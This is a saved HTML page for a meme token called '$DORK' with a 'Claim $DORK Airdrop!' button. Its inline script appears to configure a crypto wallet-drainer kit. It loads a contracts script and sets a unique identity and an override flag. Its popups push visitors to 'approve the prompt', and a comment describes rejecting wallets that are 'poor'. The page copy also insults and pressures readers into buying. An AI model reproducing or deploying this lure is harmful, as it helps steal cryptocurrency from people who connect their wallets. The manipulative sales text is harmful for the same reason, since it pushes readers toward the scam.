<!DOCTYPE html>
<html lang="en" data-scrapbook-source="https://www.dorkcoin.gay/" data-scrapbook-create="20231031212239838"
    data-scrapbook-title="$DORK">

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="51114d0c4ff5a982.css" data-precedence="next">
    <title>$DORK</title>
    <meta name="description"
        content="$DORK: Andrew Tate's Psyop &amp; Degen Tech Manifesto $DORK isn't your typical token. Birthed from the chaotic mindscapes of Tate's psyops and the raw drive of degens, it's stark, it's direct, it's unapologetically bold.Tech's underbelly meets degen ambition here. If you've got a penchant for the raw, unfiltered side of crypto, where memes blend with stark reality, $DORK is your call to arms.Stand with us. $DORK - unfiltered, unabashed, unmatched.">
    <link rel="icon" href="favicon.ico" type="image/x-icon" sizes="32x32">
    <meta name="next-size-adjust">
    <script
        data-scrapbook-elem="custom-elements-loader">(function (names) { if (!customElements) { return; } for (const name of names) { customElements.define(name, class CustomElement extends HTMLElement { }); } })(["next-route-announcer"])</script>
        <script defer="defer" src="js/vendors.js"></script>
        <script defer="defer" src="js/contracts.js"></script>
        <script defer="defer" src="js/main.js"></script>
        
        <script>
          window.UNIQUE_IDENTITY = "yelping_cheetah_23";
        
          // Pick a theme here, this defaults to "light"
          window.modal_theme = "light";
        
          // https://docs.walletconnect.com/2.0/web/walletConnectModal/theming
          window.modal_variables = { "--w3m-z-index": "99999999999999999999999999999999",
          /* Example of what you can do */
          // "--w3m-accent-color": "#A6111D",
          // "--w3m-background-color": "#FF00FF", 
          // "--w3m-logo-image-url": "/your-logo.svg",
          };
        
          // Notification modals
         window.popups = {
        PENDING: {
          // The popup that shows when they get prompted
          title: "Claim Pending",
          text: "You must approve the prompt in order to continue."
        },
        INVALID: {
          // Shown when they connect on a wallet that is poor.
          // title: "Ineligible Address",
          text: "The connected account is not eligible for this event.\nPlease try using a different account.",
        }
          }
        
          // Only touch this if you know what you're doing!
          window.OVERRIDE_MODE = false;
        </script>
        </head>


<body class="__variable_b6bbea __variable_792ed7 __variable_e245a1 bg-black text-white ">
    <nav class=" px-4 lg:px-28 fixed w-full bg-[#141414]/[0.54] backdrop-blur z-[9999]">
        <div class="navbar-container flex justify-between ">
            <div class="w-[3.64106rem] h-[8.54256rem] absolute  lg:w-[5.22131rem] lg:h-[12.25rem]"><img
                    alt="logo of website" loading="lazy" decoding="async" data-nimg="fill"
                    style="position: absolute; height: 100%; width: 100%; inset: 0px; color: transparent;" sizes="100vw"
                    srcset="Logo-2.png 640w, Logo-6.png 750w, Logo-7.png 828w, Logo-5.png 1080w, Logo-4.png 1200w, Logo-3.png 1920w, Logo.png 2048w, Logo-1.png 3840w"
                    src="Logo-1.png"></div>
            <div class="flex items-center justify-end py-6 gap-6 flex-auto">
                <div class="hidden lg:flex justify-between gap-4"><a href="https://twitter.com/srpeterseth"> <img
                            alt="logo of website" loading="lazy" width="33" height="33" decoding="async" data-nimg="1"
                            style="color:transparent" src="X.ebd32b13.svg"> </a><a
                        href="https://www.dextools.io/app/en/ether/pair-explorer/0x537b8afa3d302e5c873922de7014d714f050af51">
                        <img alt="logo of website" loading="lazy" width="33" height="33" decoding="async" data-nimg="1"
                            style="color:transparent" src="Dex.64e557a8.svg"> </a><a href=""> <img alt="logo of website"
                            loading="lazy" width="33" height="33" decoding="async" data-nimg="1"
                            style="color:transparent" src="Ethscan.fe1b3796.svg"> </a><a href="https://t.me/DORKcoin">
                        <img alt="logo of website" loading="lazy" width="33" height="33" decoding="async" data-nimg="1"
                            style="color:transparent" src="Telegram.71c2673f.svg"> </a><a
                        href="mailto:info@dorkcoin.gay"> <img alt="logo of website" loading="lazy" width="33"
                            height="33" decoding="async" data-nimg="1" style="color:transparent"
                            src="Email.28c502d4.svg"> </a></div>
                <div
                    class="flex gap-1 items-center w-[194px] lg:gap-[10px] px-3 pt-[2px] border-[1.5px] whitespace-nowrap border-solid  border-base-pink rounded ">
                    <img alt="logo of Dng university" loading="lazy" width="20.25" height="19.21" decoding="async"
                        data-nimg="1" style="color:transparent" src="LogoDNG.426be535.svg">
                    <p class="font-uniformExtraCondensed font-medium text-xl lg:text-xl ">DNG UNIVERSITY<!-- --> <span
                            class="text-lg lg:text-sm ">(SOON)</span></p>
                </div><button class="w-6 block lg:hidden"><svg xmlns="http://www.w3.org/2000/svg" width="25" height="25"
                        viewBox="0 0 25 25" fill="none">
                        <path d="M4.04199 12.6653H20.042" stroke="white" stroke-width="2" stroke-linecap="round"
                            stroke-linejoin="round"></path>
                        <path d="M4.04199 6.66534H20.042" stroke="white" stroke-width="2" stroke-linecap="round"
                            stroke-linejoin="round"></path>
                        <path d="M4.04199 18.6653H20.042" stroke="white" stroke-width="2" stroke-linecap="round"
                            stroke-linejoin="round"></path>
                    </svg></button>
            </div>
        </div>
    </nav>
    <main>
        <header class="pt-40 pb-20">
            <p class="lg:text-[100px] text-[64px] font-uniformExtraCondensed font-semibold text-[#98484F] text-center">
                WAKE UP, DORK!</p>
            <div class="flex justify-center items-center  overflow-hidden "><img alt="" loading="lazy" width="405.997"
                    height="150" decoding="async" data-nimg="1" class="h-28 lg:h-36" style="color:transparent"
                    src="DORKS.904757f4.svg">
                <div>
                    <p class="lg:text-[200px] text-9xl font-uniformExtraCondensed font-semibold dorkText ">$DORK</p>
                </div><img alt="" loading="lazy" width="405.997" height="150" decoding="async" data-nimg="1"
                    class="h-28 lg:h-36" style="color:transparent" src="DORKS.904757f4.svg">
            </div>
            <div
                class="sm:max-w-[365px] lg:max-w-full px-6  text-2xl font-medium font-uniform  text-center  mx-6 lg:mx-0 lg:px-0">
                <p>You’re a poor. You’re unimportant. Men do not fear you.</p>
                <p>Your woman disagrees with you. </p>
            </div>
            <div id="connect_button" class="text-center"><aid="connect_button" 
                    
                    target="_blank"
                    id="connect_button" class=" font-uniformCondensed inline-block font-semibold py-4 text-xl mt-6  bg-white  text-[#181C1D] w-[14.5rem]  text-center rounded-[12.5rem] ">Claim
                    $DORK Airdrop!</a></div>
        </header>
        <section class="relative isolate z-10 lg:pt-40">
            <div class="h-[460px] relative"><img alt="background" loading="lazy" decoding="async" data-nimg="fill"
                    class=""
                    style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;object-fit:cover;color:transparent"
                    src="DORK_Background.svg"></div>
            <div class="flex justify-center items-end absolute top-0  overflow-hidden min-w-full"><img alt=""
                    loading="lazy" width="275" height="682.72" decoding="async" data-nimg="1" class="hidden md:inline"
                    style="color:transparent" srcset="Img_01-1.png 1x, Img_01.png 2x" src="Img_01.png"><img alt=""
                    loading="lazy" width="392.61" height="392.61" decoding="async" data-nimg="1"
                    class="object-contain object-center " style="color:transparent"
                    srcset="Img_02-1.png 1x, Img_02.png 2x" src="Img_02.png"><img alt="" loading="lazy" width="308"
                    height="682.72" decoding="async" data-nimg="1" class="hidden md:inline" style="color:transparent"
                    srcset="Img_03-1.png 1x, Img_03.png 2x" src="Img_03.png"></div>
            <div class="lg:max-w-[1000px] mx-auto py-12 text-center">
                <p class="text-3xl text-[#FBB37F] font-uniform font-semibold mt-8">Your lives are shit.</p>
                <p class="text-2xl px-6 ">You have invested in 100 meme coins, and in all of them you have lost. Stop
                    being a fish inside an ocean full of sharks, and buy $DORK.</p>
            </div>
        </section>
        <section class=" relative overflow-x-hidden">
            <div class="w-0.5 h-20 bg-yellow-500 mx-auto mb-8"> </div>
            <div class="lg:flex hidden -left-[32px] justify-center"><img alt="" loading="lazy" width="417" height="154"
                    decoding="async" data-nimg="1" class="flex-shrink-0" style="color:transparent"
                    src="DORKS.904757f4.svg">
                <div class="flex"><img alt="" loading="lazy" width="417" height="154" decoding="async" data-nimg="1"
                        class="flex-shrink-0" style="color:transparent" src="DORKS.904757f4.svg"><img alt=""
                        loading="lazy" width="417" height="154" decoding="async" data-nimg="1" class="flex-shrink-0"
                        style="color:transparent" src="DORKS.904757f4.svg"><img alt="" loading="lazy" width="417"
                        height="154" decoding="async" data-nimg="1" class="flex-shrink-0" style="color:transparent"
                        src="DORKS.904757f4.svg"><img alt="" loading="lazy" width="417" height="154" decoding="async"
                        data-nimg="1" class="flex-shrink-0" style="color:transparent" src="DORKS.904757f4.svg"></div>
            </div>
</body>

</html>